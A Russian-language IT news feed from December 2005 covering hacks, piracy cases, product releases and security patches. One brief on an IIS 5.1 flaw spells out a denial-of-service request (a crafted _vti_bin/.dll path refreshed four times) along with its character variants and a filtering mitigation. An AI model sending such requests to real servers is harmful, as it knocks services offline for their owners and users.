Российские интернет-мошенники решили воспользоваться известностью петербургского психотерапевта Андрея Курпатова, который ведет на телеканале "Домашний" собственную программу. За очень короткое время передача "Все решим с доктором Курпатовым" и ее ведущий завоевали большую популярность, причем эта популярность шагнула за пределы телеэкранов. В крупных московских книжных магазинах Андрей Курпатов с обложек своих книг глядит на покупателей со всех сторон и потихоньку теснит даже Дэна Брауна. Активно продаются книги Курпатова в супермаркетах и на уличных лотках. Однако в интернете с психотерапевтом и телеведущим случился неприятный казус. В начале декабря на сайте www.kurpatov.ru автр этих строк обнаружил такое сообщение: "Уважаемые посетители сайта kurpatov.ru! Сообщаем вам, что c 17.11.2005 по 01.12 2005 сайт был взломан и информация, которая была размещена по адресу kurpatov.ru, не имеет отношения к доктору Андрею Курпатову! Приносим вам свои извинения. Самое интересное, что взломщики не просто взломали сайт и разместили на нем свои автографы, а решили воспользоваться известностью Андрея Курпатова для извлечения прибыли.
Более подробно

19/12/2005 10:42 Хакеры нашли первую лазейку в Xbox 360
Спустя считанные недели после выпуска Xbox 360 хакеры, похоже, нащупали способ познакомиться с программным обеспечением игровой консоли Microsoft. Группа, называющая себя Team PI Coder, утверждает, что ей удалось вытащить из Xbox 360 копии загруженных в консоль оригинальных файлов. По словам Стива Манзюка, менеджера по продуктам безопасности компании eEye Digital Security, возможность увидеть программы — только первый шаг на пути к взлому устройства Microsoft. «Пока удалось всего лишь вскрыть файловую систему, которая не сильно отличается от файловой системы первой консоли Xbox, — сказал он. — Я бы назвал это взломом игр, но не взломом Xbox 360. Хотя, можно считать, что первый шаг к этому сделан». Team PI Coder опубликовала детали нескольких игр вместе с «экстрактором», который можно использовать для их копирования, как утверждается на самодеятельном веб-сайте Xbox-Scene.com. «Загрузка таких версий нелегальна, и с ними пока ничего нельзя делать», — говорится в постинге на Xbox-Scene.com. Копии игр бесполезны, по крайней мере пока, потому что защита Xbox не позволяет исполнять копии, а на ПК эти игры тоже не работают. В текстовом файле с описанием извлеченных данных Team PI Coder пишет, что эти файлы мало на что пригодны: «Эти дампы пока нельзя исполнять, но рано или поздно это удастся сделать. Так что первая задача решена. Мы надеемся, что это вдохновит всех хакеров, кодеров и крекеров, и они примутся за дело».
Более подробно

19/12/2005 10:13 Подмосковная милиция ликвидировала пункт проката контрафактных DVD
Подмосковная милиция отчиталась об изъятии около 200 контрафактных DVD-дисков, сдававшихся в прокат, сообщает РИА Новости со ссылкой на ГУВД Московской области. В управлении заявили, что продукция была обнаружена в одном из павильонов торгового центра "Морозовский" города Орехово-Зуево. "В ходе проведения оперативно-розыскных мероприятий сотрудниками ОБЭП установлено, что 26-летняя местная жительница осуществляла незаконное использование объектов авторского права, а именно сдавала в прокат диски формата DVD", - рассказал представитель ведомства. Он при этом отметил, что причиненный правообладателям ущерб оценивается в сумму свыше 100 тысяч рублей. Милиция возбудила уголовное дело по части 2 статьи 146 УК РФ ("нарушение авторских и смежных прав"), которая предусматривает наказание в виде лишения свободы на срок до двух лет. В подмосковном ГУВД также добавили, что за минувшие сутки в Подмосковье было зарегистрировано 429 преступлений и сообщений о них, из которых 211 раскрыто. В частности, в области совершено 4 убийства, 34 грабежа и 102 кражи.
Источник

18/12/2005 13:59 ФСБ отразила 1 млн компьютерных атак
Сотрудники Федеральной службы безопасности России отразили в 2005 г более 1 млн компьютерных атак на информационные ресурсы федеральных органов государственной власти. Об этом сообщил сегодня директор ФСБ Николай Патрушев на встрече с руководителями ведущих российских СМИ, приуроченной к отмечаемому 20 декабря Дню работников органов безопасности, передает «Прайм-Тасс». Из отраженных атак «более 170 тыс пришлись на официальное интернет-представительство президента России», уточнил Н.Патрушев. Он напомнил, что, в соответствии с федеральным законом «О Федеральной службе безопасности», обеспечение информационной безопасности является одним и основных направлений деятельности возглавляемой им структуры. По словам директора ФСБ, «в течение последнего года проведены экспертные исследования более 60 типов аппаратуры нового поколения, реализующей российские алгоритмы шифрования и электронной цифровой подписи». ФСБ приняла непосредственное участие в создании в России защищенных сетей сотовой связи на базе цифрового стандарта GSM, отметил Н.Патрушев. В 2005 г «конфиденциальная сотовая связь внедрена во всех регионах РФ, причем данные услуги криптографической защиты информации доступны не только органам госвласти, силовым структурам, но также предприятиям, организациям различных форм собственности и частным лицам», подчеркнул он.
Более подробно

18/12/2005 12:34 За незаконное копирование DVD с американца требуют $100 тысяч
DVD стоимостью в $21,99 может обойтись американцу Расселу Ли (Russell Lee) в $100 тысяч, сообщает новостной ресурс News 5. Иск против Рассела Ли подала компания Paramount — дистрибьютор фильма Coach Carter. Незаконное приобретение и распространение этой картины через файлообменную сеть eDonkey и инкриминируется американцу. «Я даже не понимаю, о чем они говорят. Я не делал того, в чем меня обвиняют», — утверждает Рассел Ли. Представители Paramount осмотрели 4 домашних компьютера Ли. Истцы предположили, что подозреваемый очистил жесткий диск одной из машин, чтобы скрыть следы инкриминируемого ему преступления. В свою очередь, ответчик утверждает, что в момент копирования фильма через eDonkey его беспроводная сеть была незащищенной, а потому доступ к компьютеру можно было получить и с улицы, например из припаркованного автомобиля. «Если я не смогу сделать так, чтобы меня поняли, прошу всех устанавливать беспроводное соединение с помощью тех, кто знает, как это делается. Потому что если вы не знаете, как это делается, то столкнетесь с проблемами, с которыми столкнулся я», — заявил Рассел Ли.
Подробности

18/12/2005 12:02 План выхода релизов FreeBSD в 2006 году
Scott Long представил примерный график выхода релизов FreeBSD в следующем году, сообщает linux.org.ru. В частности, в марте планируется выход 5.5-RELEASE, который будет последним в этой ветке. Поскольку 5.5-RELEASE будет готовиться почти параллельно с 6.1-RELEASE, то основное внимание будет уделено именно 6.1-RELEASE, пользователям 5-й ветки рекомендуется переходить на FreeBSD 6. Устранение ошибок безопасности в 5-ке будет поддерживаться до 2007 года. Что касается FreeBSD 6, то в следующем году планируется сделать три релиза этой ветки, возможно будет еще один релиз в 2007 году, после чего работа будет полностью сфокусирована на FreeBSD 7.
Подробности

18/12/2005 11:39 Владельцы Kazaa могут получить срок
В результате инициированного индустрией звукозаписи судебного процесса о нарушении постановления суда создатели файлообменного ПО Kazaa могут оказаться за решеткой. Фирмы звукозаписи утверждают, что компания Sharman Networks, которой принадлежит Kazaa, не выполнила постановление федерального суда за номером 4, предписывающее к 5 декабря модифицировать ПО с тем, чтобы оно отфильтровывало 3000 ключевых слов. Однако Sharman не согласна с этим, так как компания уже заблокировала доступ к загрузке Kazaa для австралийских пользователей, выявляя их по IP-адресам. «Иски о нарушении постановления суда случаются здесь очень редко, и я еще никого не отправлял в тюрьму, — сказал в четверг судья Федерального суда в Сиднее Муррей Уилкокс. — Несколько раз приходилось угрожать, но слушания назначаются впервые». В иске фигурируют генеральный директор Sharman Networks Никки Хемминг, директор Altnet Кевин Бермейстер и ассоциированные компании Sharman Networks, LEF Interactive, Altnet и Brilliant Digital Entertainment. Уилкокс заслушает ходатайство индустрии звукозаписи о невыполнении постановления суда 30 января. Адвокат индустрии звукозаписи Тони Баннон отметил, что его сторона не желает никому тюрьмы, но убеждена, что Sharman не выполнила постановление суда. «Они всего лишь попытались заблокировать загрузки ПО Kazaa для австралийских IP-адресов», — сказал Баннон, уверяя, что это «неэффективно». «Они все еще предоставляют нефильтрующие версии ПО многим пользователям, и нарушение авторских прав продолжается… они по-прежнему дают рекламу… мы считаем это явным нарушением постановления номер четыре».
ZDNet

18/12/2005 10:51 Уязвимость в Microsoft IIS
Довольно любопытную уязвимость обнаружил Inge Henriksen из Норвегии. Как он выяснил, софрмировав специальный запрос, можно вызвать типичный DoS в выпускаемом M$ Вэб-сервере IIS. Странность заключается в том, что уязвимость присутствует в версии 5.1 и отсутствует в версиях 5.0 и 6.0. Для выполнения атаки необходимо сформировать запрос (например, при помощи браузера) вида http://www.example.xom/_vti_bin/.dll/*~0 и обновить запрос 4 раза. Вместо знака "*" может быть введын любой из ASCII-символов: %01-%1f, %3f, ", *, :, <, >. Вместо символf "~0" может быть последовтельности цифр от "~1" до "~9". Существует один нюанс - виртуальная директория на атакуемом сервере должна иметь полномочия "Scripts & Executables" (что, по умолчанию выставлено на директории "_vti_bin" и "_sharepoint"). Патчей на данный момент не существует. В качестве меры защиты рекомендуется фильтровать запросы, содержащие "~0" - "~9" (без кавычек). Более подробный анализ представлен в блоге автора.
Подробности

18/12/2005 10:18 Google сделала Gmail доступной для мобильников
Компания Google объявила в пятницу о создании специальной версии своего почтового сервиса Gmail. Gmail Mobile позволяет зарегистрированным пользователям электронной почты работать со своим ящиком с мобильного телефона, передает Reuters. Для доступа к новому сервису необходим современный мобильный телефон, в программное обеспечение которого входит веб-браузер. С его помощью пользователи Gmail могут просматривать на телефоне вложенные фотографии и документы, а также звонить авторам сообщений, указавшим свои телефонные номера в учетных данных Gmail. Письма, хранящиеся на мобильном телефоне и в ящике пользователя Gmail в Интернете, автоматически синхронизируются. В настоящее время сервис доступен только для пользователей Gmail в США.
Подробности

17/12/2005 17:42 Тюменский пират нанес крупный ущерб компании Microsoft
В Тюмени в отношении мужчины, который причинил крупный ущерб корпорации Microsoft возбуждено уголовное дело. Об этом в пятницу сообщил старший следователь прокуратуры Калининского административного округа Тюмени Владимир Михальков. По его словам, сотрудниками отдела "К" ГУВД Тюменской области была проведена проверочная закупка в торговой точке частного предпринимателя, расположенной на улице Ямской. Оперативники обнаружили и изъяли компакт-диски и DVD в количестве 18 штук, содержащие контрафактные копии Windows XP Pro, Windows 2003 Server, Windows Millenium Edition, Windows 98 SE, Microsoft office 2003 Pro, Microsoft office XP Pro, Microsoft office 2000 Pro, Microsoft office 97 Pro, являющиеся объектами, правообладателем которых является корпорация "Microsoft", сообщает РИА "Новости". "Бизнесмен, преследуя материальное обогащение, незаконно с целью сбыта хранил данные компакт-диски и DVD неустановленное следствием время в помещении арендуемого им торгового зала магазина "Гарнизонный" на улице Ямской. При этом он осознавал, что данные компакт диски и DVD являются контрафактными экземплярами", - отметил собеседник агентства. В результате преступных действий предпринимателя корпорация Microsoft не дополучила доход в сумме 208 тысяч 516 рублей 56 копеек, чем корпорации Microsoft причинен крупный ущерб на указанную сумму.
Источник

17/12/2005 16:34 Браузер Opera может перейти к Google
В интернете ходят слухи о том, что компания Google собирается купить норвежского разработчика браузеров Opera Software. Это предположение действительно имеет смысл. Слухи начали циркулировать в блогосфере позавчера. Информацию запустил бывший директор отделения Yahoo! Europe со ссылкой на хорошо информированные источники. Естественно, никакого подтверждения этим слухам не было, а вскоре и компания Opera официально опровергла информацию о продаже фирмы, поэтому мы ничего не публиковали по этому поводу на «Вебпланете». Однако эпидемия слухов распространялась все дальше и дальше. Почему этот слух оказался настолько живуч? Да потому что он действительно правдоподобен, как с эмоциональной точки зрения (многие люди любят и Google, и Opera), так и с логической. Покупка фирмы Opera действительно имеет смысл для Google. Совсем недавно компания Opera Software начала распространять свой браузер бесплатно. Они заключили соглашение с Google и стали получать финансирование по партнерской программе AdWords (по умолчанию поисковые запросы из браузера отправляются на Google). Уже очень давно ходят слухи (опять слухи!), что Google собирается выпустить свой собственный браузер. Полтора года назад они зарегистрировали загадочный домен Gbrowser.com, после этого приняли на работу ведущего программиста Firefox Бена Гуджера и начали активно финансировать этот альтернативный браузер. Но они не могут его купить. Браузер Firefox создается на общественных началах и его невозможно купить. Если Google действительно желает иметь собственный браузер, то Opera — это идеальный выбор.
Версия "Вебпланеты"

17/12/2005 13:40 Хакеры взломали сеть британской благотворительной организации
Британское благотворительное общество «Помощь церкви» подверглось хакерской атаке, сообщает сайт News.com со ссылкой на представителей потерпевших. В «Помощи церкви» пока не знают, какую сумму пожертвований похитили хакеры. Известно лишь, что внешнему доступу оказались открыты адреса более 2 тысяч человек, вносивших пожертвования. Используя полученные сведения, преступники обратились напрямую к этим людям и попытаться у них получить дополнительные средства. По словам национального директора «Помощи церкви» Невилла Кирка-Смита, благотворительное общество пребывает в шоке: «Помимо очевидного стресса, перенесенного подателями взносов, мы получили проблему, связанную с похищения идентификационных данных нашего общества. В конце концов, страдают и те, кому эти пожертвования предназначались. Я призываю все организации регулярно проверять безопасность своих веб-ресурсов и убеждаться в том, что все программное обеспечение обновляется вовремя». Инцидент с «Помощью церкви» вынудил Британскую благотворительную комиссию выпустить предупреждение для всех благотворительных организаций, связанное с необходимостью обезопасить себя от интернет-преступлений.
Источник

17/12/2005 13:22 Google, Microsoft и Sun Microsystems создали новую интернет-лабораторию
В четверг компания Google и корпорация Microsoft совместными усилиями создали академическую исследовательскую интернет-лабораторию. К проекту, который оценивается в 7,5 млн. долларов США, присоединилась и компания Sun Microsystems, сообщает Associated Press. Лаборатория носит название "Безотказные адаптивные распределенные системы" (Reliable Adaptive Distributed Systems Lab, RAD Lab) и организована при Калифорнийском университете в Беркли. Ежегодно на протяжении пяти лет компании-учредители будут вкладывать в равных долях в лабораторию по 1,5 млн. долларов США. Штат RAD насчитывает сегодня шесть университетских преподавателей и десять выпускников-специалистов по вычислительной технике. Руководителем RAD стал профессор Дэвид Паттерсон. По замыслу, лаборатория будет заниматься созданием разнообразного программного обеспечения для использования в интернете. Разработки RAD позволят запускать масштабные интернет-проекты, подобные онлайновому аукциону eBay или популярнейшему поисковику Google.
Подробности

17/12/2005 12:20 Microsoft разместит Avalon вне ядра Windows Vista
Корпорация Microsoft намерена разместить графический интерфейс Avalon вне ядра будущей операционной системы Windows Vista. Avalon станет одним из ключевых нововведений в Vista. Это будет полностью векторная система, объединяющая в единое целое вывод двумерной и трёхмерной графики. Avalon сможет обеспечивать вывод информации в графическом виде для любых приложений и процессов, а векторный режим работы позволит лучше справляться с обработкой больших объёмов графической информации. Как сообщает TechWorld, исключение Avalon из ядра ОС должно положительно отразиться на надежности и уменьшить количество сбоев. Дело в том, что ядро работает в привилегированном режиме Ring 0, в котором процессы и драйверы могут выполнять любые операции, в том числе перезаписывать произвольные области памяти. И именно ошибки в работе драйверов, по данным Microsoft, ответственны за 89 процентов сбоев, возникающих на компьютерах с Windows XP. В Windows Vista система Avalon будет работать в режиме User Mode. Благодаря этому Microsoft рассчитывает существенно снизить количество ошибок и облегчить тестирование графического ядра, которое уже не будет столь жёстко связано с ядром самой ОС.
Более подробно

17/12/2005 11:57 Adobe будет выпускать патчи по графику
Adobe Systems приняла решение о регулярном выпуске обновлений безопасности для своих продуктов. Патчи начнут регулярно выходить ежемесячно в 2006 году. Дата первого пока не определена. Традиция выпуска обновлений по расписанию уже устоялась у Microsoft и Oracle. Microsoft выпускает обновления во второй вторник каждого месяца, а Oracle – ежеквартально. Как и Microsoft, Adobe будет предварительно оповещать о выходе патча пользователей. На прошлой неделе Adobe завершила покупку Macromedia, сообщил Silicon.
CNews

17/12/2005 11:14 В Украине телефонный хакер получил 3 года
В Николаевской области (Украина) осужден иностранец, который, как установила Служба безопасности Украины, незаконно подключался к телефонным сетям, осуществляя длительные бесплатные звонки в другие страны, сообщила «proIT» пресс-группа УСБУ в Николаевской области. Используя поддельные таксофонные карточки, так называемые эмуляторы, правонарушитель осуществлял бесплатные телефонные переговоры с абонентами из разных стран мира, нанося этим значительный материальный ущерб государственному оператору связи. В частности, внимание сотрудников Управление СБУ привлекло то, что из такого заменителя таксофонной карточки на протяжении 2005 года систематически осуществлялись бесплатные международные звонки на телефонные номера операторов мобильной связи в Пакистане, Греции, России, Болгарии. Поисковые мероприятия работников милиции осложнялись тем, что процессор, вживленный в карточку, при каждом телефонном соединении генерировал и присваивал ей новый номер. В результате проведенной операции сотрудниками Управления СБУ на горячем во время «бесплатных» международных переговоров был задержан уроженец Пакистана, личность без гражданства, который жил в одном из районов Николаевской области. Следственным отделом СБУ было возбуждено уголовное дело по признакам преступления, предусмотренного ч.2 ст. 361 (незаконное вмешательство в работу компьютерных сетей) Уголовного кодекса Украины. Районный суд города Первомайска Николаевской области признал иностранца виновным в совершении преступления и приговорил его к лишению свободы сроком на три года.
Подробности

17/12/2005 10:49 Против Microsoft подали еще один патентный иск
На компанию Microsoft снова подали в суд, обвинив в нарушении чужих патентов. Как сообщает AP, на этот раз истцом выступает компания Visto Corp., которая занимается разработкой технологий мобильной связи. В Visto полагают, что Microsoft нелегально воспользовалась тремя запатентованными ими технологиями при производстве своих продуктов. Технологии касаются передачи данных между серверами и портативными электронными устройствами под управлением ОС Windows Mobile 5.0. От софтверной корпорации требуют возмещения ущерба (суммы не называются) и прекращения использования разработок, о которых идет речь. В целом за последние годы против Microsoft была подана целая серия патентных исков от различных лиц и организаций. Кроме того, в четверг стало известно, что Microsoft получила патент на "функцию паузы при нажатии пользователем на гиперссылку" при воспроизведении видеопрограмм. Соответствующая заявка была одобрена патентным бюро США USPTO.
Подробности

16/12/2005 15:00 Продукт Microsoft отключает "маячок" на ворованных ноутбуках
Сервис онлайновой защиты от вирусов и троянских программ Windows OneCare Live, открытый Microsoft 29 ноября в тестовом режиме, отключает программу Computrace LoJack от Absolute Software. Computrace LoJack незаметно подает сигнал через интернет с краденого ноутбука. OneCare определяет один из модулей как вирус, а именно Win32NewMalware.B, и рекомендует пользователям поместить файл в карантин, сообщил Дэвид Хекет (David Hackett), пользователь Computrace LoJack и тестер OneCare из штата Вашингтон, США. Computrace LoJack оповещает о местонахождении краденого ноутбука. Программа делает это незаметно. OneCare не дает ей выйти в интернет, - утверждает технический директор Absolute Software Филип Гарднер (Philip Gardner). Разработчики "маячка" предупредили Microsoft, и в корпорации сообщили о работе над проблемой. "Это известная ошибка, которая была обнаружена в процессе бета-тестирования Windows OneCare Live. Исправление было сделано 2 декабря, и оно должно быть у всех пользователей OneCare", - сказала Саманта МакМанус (Samantha McManus), менеджер бизнес-стратегий Microsoft.
CNews

16/12/2005 13:23 Британские провайдеры: "Россия - главный враг интернета"
Британское профессиональное объединение интернет-провайдеров ISPA назвало номинантов на получение званий "Герои Интернета" и "Враги Интернета", которые оно присуждает ежегодно. Как сообщает интернет-издание The Register, на титул главного "врага" в этом году претендуют Еврокомиссия, компания Sony BMG и власти Российской Федерации. Еврокомиссия заслужила это звание, по мнению специалистов из ISPA, за попытки регулировать содержимое интернет-сайтов, озвучиваемые комиссаром ЕС по информационным технологиям и СМИ Вивьен Рединг (Viviane Reding) на фоне неспособности в течение года утвердить обещанные правила защиты интеллектуальной собственности. Звукоиздательский концерн Sony BMG "впал в немилость" за свою защиту музыкальных дисков, которая, как накануне сообщалось, оказалась сравнима по степени вредоносности с компьютерными вирусами. Российские власти, по мнению представителей британских провайдеров, "не могут справиться с нелегальными сайтами и сетевыми злоумышленниками на своей территории". Ранее титул "врагов" получали МВД Великобритании и национальный оператор связи British Telecom. Кандидатами в "герои" в ISPA считают британское парламентское объединение APIG, занимающееся вопросами Интернета, члены которого (в него входят представители всех парламентских партий) ведут работу по усовершенствованию законодательства, чтобы эффективнее бороться с хакерами. Также в числе кандидатов на почетное звание регулирующий телекоммуникационную отрасль орган OTA, который ведет работу в области ценового регулирования среди провайлеров. Кроме того, в "герои" прочат другой регулирующий орган Ofcom, который также с помощью административных мер следит за состоянием рынка платных телефонных услуг.
Источник

16/12/2005 12:58 D-Link укрепляет безопасность SMB-пользователей
Корпорация D-Link объявила о выпуске новых устройств семейства NetDefend, предназначенного для предприятий малого и среднего бизнеса. DFL-800 и DFL-1600 (D-Link NetDefend Firewall/VPN Applications) совмещают уже имеющуюся в выпускаемых в сетевых экранах этой серии функциональность инспекции пакетов с учетом состояния протокола, фильтрацию контента и обнаружение внешних вторжений. Шлюз NetDefend Application Security Gateway, или DFL-M510, который устанавливается между экраном и внешней частью сети, обладает возможностью управления трафиком в соответствии с установленной политикой использования Internet. Межсетевой экран поддерживает до 10 линий со скоростью передачи данных 100 Мбит/с, обслуживая одновременно до 25 тыс. сессий. Соответствующие параметры DFL-1600 - 6 линий Gigabit Ethernet и 400 тыс. сессий.
"Открытые системы"

16/12/2005 12:45 Прекращается поддержка сборки Linux ядра компилятором GCC 2.95
Andrew Morton, мантейнер 2.6.x ветки Linux ядра, заявил о планах по прекращению поддержки GCC 2.95.x в системе сборки ядра и исключению из кода ряда подпорок необходимых для сборки с использованием GCC 2.95 (сообщает opennet.ru).
Подробности

16/12/2005 12:33 Windows XP и Server 2003 получили сертификаты Common Criteria
Корпорация Microsoft объявила о том, что её операционные системы Windows последних версий получили сертификат Common Criteria четвертого уровня. Сертификация Common Criteria (СС) представляет собой общепризнанный стандарт в области оценки безопасности и надежности программного обеспечения и других ИТ-продуктов. Требования, предъявляемые к сертифицируемым продуктам, и методы проведения сертификации описываются в международном стандарте ISO-IEC 15408. Получение сертификата СС означает, что программное решение является одним из наиболее безопасных и может использоваться для выполнения многих критически важных задач. Три года назад сертификат Common Criteria четвертого уровня (Evaluation Assurance Level 4, EAL 4) получила операционная система Windows 2000. Теперь к ней добавились Windows Server 2003 Standard Edition (32-битная версия с первым сервис-паком), Windows Server 2003 Enterprise Edition (32-разрядная и 64-разрядная версии с первым пакетом обновлений), Windows Server 2003 Datacenter Edition (32-разрядная и 64-разрядная варианты с SP1), Windows Server 2003 Certificate Server CIMC, а также Windows XP Professional и Windows XP Embedded со вторым сервис-паком. Причем на этот раз продуктам Microsoft был выдан сертификат EAL 4+, где символ "+" означает соответствие требованиям ALC_FLR.3 (систематическое устранение недостатков).
Более подробно

16/12/2005 12:17 Евросоюз принял новые правила хранения данных
Европейский парламент одобрил правила, согласно которым телефонные компании обязаны хранить в течение двух лет записи голосовых и интернет-звонков для последующего использования их в антитеррористических расследованиях. В случае необходимости полиция сможет иметь доступ к информации, но не к содержанию, о звонках, текстовых сообщениях и интернет-данных. Предоставляться будут: время звонка и его продолжительность, местонахождение телефона, на который звонили, детали связи, осуществляемой через интернет, детали, но не содержание, электронных писем и пользования услугами ip-телефонии. Также в архиве будует храниться инфоромация о звонках, при которых соединение было установлено, но дальнейшей связи не последовало. С инициативой введения подобных мер обратилась к другим странам-членам ЕС Великобритания после июльских взрывов в Лондоне. В подержку законопроекта, который уже был одобрен двумя крупнейшими группами Европейской народной партией и Социалистами, проголосовало 378 против 197 человек. В Ассоциации интернет-провайдеров (ISPA), так же отмечвают, что ещё неизвестно, каким образом эти меры, став частью британских законов, отразятся на провайдерах. Им придется искать способы для организации хранения данных, управления ими и обеспечения доступа официальным структурам.
"Компьюлента"

16/12/2005 11:53 Google выпустила API для специализации домашних страниц
В среду поисковый гигант предложил инструменты, при помощи которых разработчики могут создавать мелкие прикладные модули для домашних страниц пользователей Google. На странице Google Homepage API содержится информация и программное обеспечение для создания модулей, или «виджетов», которые затем можно размещать на персонализированных домашних страницах Google. Сегодня домашние страницы Google можно дополнять такими вещами, как новости, каналы RSS, рецепты, биржевые котировки, программа телепередач или цитаты дня. Примеры новых модулей содержатся на Google Homepage Content Directory. В их числе карта погоды, дата и время, а также индивидуализированный логотип Google. «Google Homepage API гибок и прост в применении, и чтобы создать новый модуль, не нужно ничего загружать», — говорится в официальном блоге Google. «Виджеты основаны на формате файлов XML, причем дополнительный код JavaScript и HTML размещается на вашем собственном сервере или — если у вас его нет — в любом другом доступном месте, включая Google Base», — пишет в блоге Google Blogoscoped Филипп Ленссен.
Подробности

16/12/2005 11:37 Microsoft приступает к тестированию Exchange 12
В среду Microsoft сообщила о выпуске первой тестовой версии Exchange 12, следующего поколения своего серверного ПО для управления электронной почтой и календарями. В числе новых функций Exchange возможность управлять голосовой почтой и факсами, улучшенные средства управления ПО для ИТ-менеджеров и усовершенствованный почтовый клиент на базе Web. В рамках движения в направлении так называемой единой службы передачи и обработки сообщений пользователи Exchange получат также возможность обращаться к своей электронной почте по телефону и прослушивать текст, воспроизводимый компьютером. Тестовая версия будет предложена примерно 1400 корпоративных заказчиков, производителей компьютеров и других организаций. «Вероятно, в середине 2006 года мы выпустим вторую бета-версию, в которой будут дополнительные возможности», — сказала старший продакт-менеджер Меган Кидд. Первоначально Microsoft надеялась выпустить финальную версию ПО в будущем году, но недавно предупредила, что продукт выйдет не раньше 2007 года. Он будет работать только с серверами на базе 64-разрядных процессоров, но к моменту выхода Exchange 12 большинство новых серверов будет снабжаться именно такими чипами.
Подробности

16/12/2005 10:49 Перуанские и чилийские хакеры начали интернет-войну
В южноамериканском сегменте Интернета зафиксировано повышение активности перуанских и чилийских хакеров, которые проводят регулярные атаки против правительственных интернет-ресурсов. Перуанские хакеры регулярно пытаются взломать чилийские сайты, и наоборот. Как полагают наблюдатели, это связано с обострением территориального спора между Чили и Перу и недавних политических дебатов на эту тему. Перу претендует на 38 тысяч квадратных километров территориальных рыбопромысловых вод, закрепленных сейчас за Чили. Кроме того, жители обеих стран претендуют на авторство местного популярного алкогольного напитка "писко" (pisco). Хакеры с обеих сторон пытаются взломать государственные сайты соседей страны и разместить там свои высказывания на эти актуальные темы. Так, по сообщению BBC News, недавно чилийским хакерам удалось взломать и заменить содержимое главной страницы перуанского министерства юстиции.
Подробности

16/12/2005 10:23 Microsoft и Mozilla призвали пользователей обновить свои браузеры
Компания Microsoft выпустила очередной набор обновлений для ОС Windows и браузера Internet Explorer. Традиционно, всем пользователям этих продуктов рекомендуется как можно быстрее скачать и установить эти обновления, так как они закрывают очередную серию уязвимостей, некоторые из которых носят статус "критичных". Это означает, что в случае появления хакерских инструментов или вирусов, эксплуатирующих эти "дыры", пользовательским компьютерам угрожает "захват системы". По сообщениям СМИ, в хакерской среде уже циркулирует описание того, как можно злонамеренно воспользоваться наиболее критичной из нынешних дыр. Примечательно, что одна из новых заплаток для IE делает невозможной работу программы CodeSuport для "раскрытия" скандально известной музыкальной защиты XCP, опубликованную накануне фирмой Sony BMG. Как сообщалось, было установлено, что эта программа наносит системам еще больший вред, чем основной модуль XCP, с вредностью которого она призвана бороться. После того, как было обнаружено, что XCP по своим свойствам близка к вирусу, ее описание было добавлено в свои базы большинством производителей антивирусных программ. Кроме того, в хакерской среде и среди специалистов по компьютерной безопасности накануне начали распространяться сведения о том, как злонамеренно воспользоваться уязвимостью во втором по популярности браузере в мире - Mozilla Firefox. Сведения касаются "дыры" в этом продукте, которая присутствовала в версиях до 1.0.4. В версии 1.0.5, которая вышла минувшим летом, эта уязвимость была устранена. Пользователи ранних версий подвержены риску незаметно передать злоумышленникам или вирусам полный контроль над компьютером в случае, если их заманят на особым образом сформированную хакерскую интернет-страницу. Создатели браузера Firefox из некоммерческого объединения Mozilla Foundation вновь обращают внимание интернет-пользователей на необходимость регулярно обновлять программы, в первую очередь это касается тех приложений, которые непосредственно работают с Интернетом. Уязвимости регулярно обнаруживаются в операционных системах, браузерах, медиаплейерах и даже в антивирусах.
Источник

13/12/2005 15:01 IBS поможет операторам в борьбе с мошенничеством
IBS сообщает о выводе на рынок нового решения для телекоммуникационных компаний - Системы обнаружения мошенничества и анализа потерь доходов оператора (СОПАМ). Это решение ориентировано на операторов транзитной, мобильной и фиксированной связи и позволяет им решать как внутренние проблемы (некорректная работа оборудования, ошибки в тарификации и биллинге), так и внешние, связанные с негативным поведением абонентов и присоединенных операторов (мошенничество, несанкционированный доступ в сеть, и т.п.). СОПАМ интегрируется с имеющимися информационными системами и выполняет две основные функции: обнаружение и предотвращение мошенничества, включая выявление негативного и нетипичного поведения абонентов, случаев несанкционированного использования сетевых ресурсов, контроль потребления услуг абонентами; анализ потерь доходов, включая обнаружение потерь информации о совершенных вызовах от коммутационного оборудования; искажения информации в платформе сопряжения, верификацию биллинга (гарантирование достоверности тарификации и правильности взаиморасчетов с присоединенными операторами).
Источник

13/12/2005 14:30 Полку виртуальных машин прибыло
Parallels, Inc. объявила о выходе релиза виртуальной машины Parallels Workstation 2.0 (несмотря на номер, это первая доступная публично версия), сообщает bugtraq.ru. Доступны версии для Linux и Windows, обеспечивается широкая поддержка гостевых систем, включая такую экзотику на сегодня, как OS/2 Warp и eComStation, не говоря уж о всех Windows, FreeBSD и популярных Linux'ах. Цена в 49$ за лицензию также является самой низкой в индустрии. С технический точки зрения интерес представляет реализованная технология Lightweight Hypervisor. Встроенный в ВМ гипервизор частично отстраняет хостовую ОС от физического процессора, самостоятельно обрабатывая все прерывания и исключения. В результате достигается большая изоляции гостевых ОС, повышается стабильность и производительность. Наконец, Parallels Workstation поддерживает Intel Virtualization Technology (VT-x) и специально оптимизирована для работы в VT-mode на новейших VT-enabled процессорах от Intel. Обещается поддержка архитектуры AMD Pacifica после того как та станет доступной.
О продукте

13/12/2005 13:57 https не спасает от фишеров
Группа компаний, выпускающих SSL-сертификаты для сайтов с шифрованным соединением (https), планирует в следующем году пересмотреть практику выдачи этих документов, поскольку зачастую они создают у пользователя чувство ложной безопасности и приводят к успеху мошенников. Самая серьезная проблема значка желтого замка в браузере, обозначающего защищенное соединение, — в невнимательности при выдаче сертификатов. SSL-сертификат включает ключ шифрования, название организации-обладателя и срок годности, подписанные издателем. Несколько лет назад проверка заявителя на принадлежность к указанной организации начала проводиться «спустя рукава». Некоторые издатели довольствовались лишь фактом существования почтового ящика, откуда пришел запрос. Этим воспользовались фишеры. Впрочем, им необязательно выдавать свой сертификат за реальный: попадая на подставной сайт по защищенному соединению, пользователь видит тот же самый желтый замок. Редко кто догадывается посмотреть подробности сертификата и увидеть, что сертификат выдан совсем другой организации. «Проблема с базовым сертификатом — в низком уровне проверки заказчика, а методы подтверждения в браузерах нелегки для среднего пользователя», — сказал Джим Мелони (Jim Maloney), директор по безопасности компании Corillian, предоставляющей технологии онлайновых платежей более чем 100 банкам.
Более подробно

13/12/2005 12:52 Вышел "портативный" браузер Firefox 1.5
